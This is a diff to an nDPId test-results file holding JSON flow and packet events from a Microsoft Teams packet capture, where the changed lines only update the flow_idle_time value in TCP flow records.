+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1493,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1587041683378,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041683378,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VAJAAGwGd3g0ck0hwKgBBgG77IQbiSB\/F+H6CKASIABpjQAAAgQFoAEDAwgEAggKYR77TDCEshI="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1494,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1587041683379,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041683379,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyEAbsX4foIG4kggIAQEAmoEAAAAQEICjCEsj9hHvtM"} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1495,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683333,"flow_last_seen":1587041683379,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041683379,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet 
type","datalink":1,"packet_id":1499,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041683406} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":1499,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041683396,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1503,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041683333,"flow_last_seen":1587041683431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041683431,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 
4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} -00876{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1516,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10374,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1587041683511,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1503,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041683333,"flow_last_seen":1587041683431,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041683431,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +00876{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1516,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10374,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1587041683511,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1533,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041683611} 
00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":1533,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041683605,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684291,"flow_last_seen":1587041684291,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041684291,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -210,12 +210,12 @@ 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684291,"flow_last_seen":1587041684291,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041684291,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"substrate.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1686,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1587041684304,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1587041684304,"pkt":"KDc3AG3IEBMx8Tl2CABFAADIzNlAADkR8PPAqAEBwKgBBgA16AsAtAAAN+6BgAABAAUAAAAACXN1YnN0cmF0ZQZvZmZpY2UDY29tAAABAAHADAAFAAEAAABCABQJc3Vic3RyYXRlB21zLWFjZGPAFsAyAAUAAQAAABYACAVhZmQta8AWwFIABQABAAAAGQAoEm91dGxvb2stb2ZmaWNlLWNvbQZrLTAwMDIIay1tc2VkZ2UDbmV0AMBmAAUAAQAAAKAAAsB5wHkAAQABAAAAoQAEDWsSCw=="} 
00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1686,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041684291,"flow_last_seen":1587041684304,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041684304,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"substrate.office.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.18.11"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1687,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684306,"flow_last_seen":1587041684306,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041684306,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1687,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1587041684306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041684306,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGWZTAqAEGDWsSC+yFAbvNnLiZAAAAALAC\/\/\/7GwAAAgQFtAEDAwUBAQgKMIS1wQAAAAAEAgAA"} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1697,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1587041684317,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041684317,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0FJpAAHUGEAYNaxILwKgBBgG77IU13hw0zZy4moAS\/\/\/HZQAAAgQFoAEDAwgBAQQC"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1698,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1587041684317,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041684317,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGWazAqAEGDWsSC+yFAbvNnLiaNd4cNVAQIADoJAAA"} -00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1699,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041684306,"flow_last_seen":1587041684317,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041684317,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-01688{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1722,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041684306,"flow_last_seen":1587041684362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1587041684362,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","server_names":"outlook.office.com,attachment.outlook.office.net,attachment.outlook.officeppe.net,bookings.office.com,delve.office.com,edge.outlook.office365.com,edgesdf.outlook.com,img.delve.office.com,outlook.live.com,outlook-sdf.live.com,outlook-sdf.office.com,sdfedge-pilot.outlook.com,substrate.office.com,substrate-sdf.office.com,afd-k-acdc-direct.office.com,beta-sdf.yammer.com,teams-sdf.yammer.com,beta.yammer.com,teams.yammer.com,attachments.office.net,attachments-sdf.office.net,afd-k.office.com,afd-k-sdf.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Cloud Services CA-1","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Outlook.office.com","alpn":"h2,http\/1.1","fingerprint":"AA:D3:F5:66:06:48:AA:F8:8E:9B:79:D6:7F:1D:53:EA:3F:97:03:A2"}} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1687,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684306,"flow_last_seen":1587041684306,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041684306,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1687,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1587041684306,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041684306,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGWZTAqAEGDWsSC+yFAbvNnLiZAAAAALAC\/\/\/7GwAAAgQFtAEDAwUBAQgKMIS1wQAAAAAEAgAA"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1697,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1587041684317,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041684317,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0FJpAAHUGEAYNaxILwKgBBgG77IU13hw0zZy4moAS\/\/\/HZQAAAgQFoAEDAwgBAQQC"} 
+00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1698,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1587041684317,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041684317,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGWazAqAEGDWsSC+yFAbvNnLiaNd4cNVAQIADoJAAA"} +00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1699,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041684306,"flow_last_seen":1587041684317,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041684317,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01688{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1722,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041684306,"flow_last_seen":1587041684362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1587041684362,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","server_names":"outlook.office.com,attachment.outlook.office.net,attachment.outlook.officeppe.net,bookings.office.com,delve.office.com,edge.outlook.office365.com,edgesdf.outlook.com,img.delve.office.com,outlook.live.com,outlook-sdf.live.com,outlook-sdf.office.com,sdfedge-pilot.outlook.com,substrate.office.com,substrate-sdf.office.com,afd-k-acdc-direct.office.com,beta-sdf.yammer.com,teams-sdf.yammer.com,beta.yammer.com,teams.yammer.com,attachments.office.net,attachments-sdf.office.net,afd-k.office.com,afd-k-sdf.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Cloud Services CA-1","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Outlook.office.com","alpn":"h2,http\/1.1","fingerprint":"AA:D3:F5:66:06:48:AA:F8:8E:9B:79:D6:7F:1D:53:EA:3F:97:03:A2"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1753,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041684611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":1753,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041684501,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1775,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685090,"flow_last_seen":1587041685090,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1587041685090,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -234,8 +234,8 @@ 00813{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1781,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685091,"flow_last_seen":1587041685104,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041685104,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"42.1.1.17"}} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1782,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1587041685105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":161,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":161,"pkt_l4_len":127,"thread_ts_msec":1587041685105,"pkt":"KDc3AG3IEBMx8Tl2CABFAACTMl9AADkRi6PAqAEBwKgBBgA1\/s4AfwAAB0qBgAABAAIAAAAAD3Ryb3V0ZXIyLWFzc2UtYQd0cm91dGVyBXRlYW1zCW1pY3Jvc29mdANjb20AAAEAAcAMAAUAAQAADNUAHg90cm91dGVyMi1hc3NlLWEIY2xvdWRhcHADbmV0AMBJAAEAAQAAAAgABDRyDy0="} 
00814{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1782,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685092,"flow_last_seen":1587041685105,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041685105,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.15.45"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1783,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685106,"flow_last_seen":1587041685106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685106,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1783,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1587041685106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685106,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGNWvAqAEGNHIPLeyHAbsC\/Q6WAAAAALAC\/\/9IhwAAAgQFtAEDAwUBAQgKMIS4zgAAAAAEAgAA"} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1783,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685106,"flow_last_seen":1587041685106,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685106,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1783,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1587041685106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685106,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGNWvAqAEGNHIPLeyHAbsC\/Q6WAAAAALAC\/\/9IhwAAAgQFtAEDAwUBAQgKMIS4zgAAAAAEAgAA"} 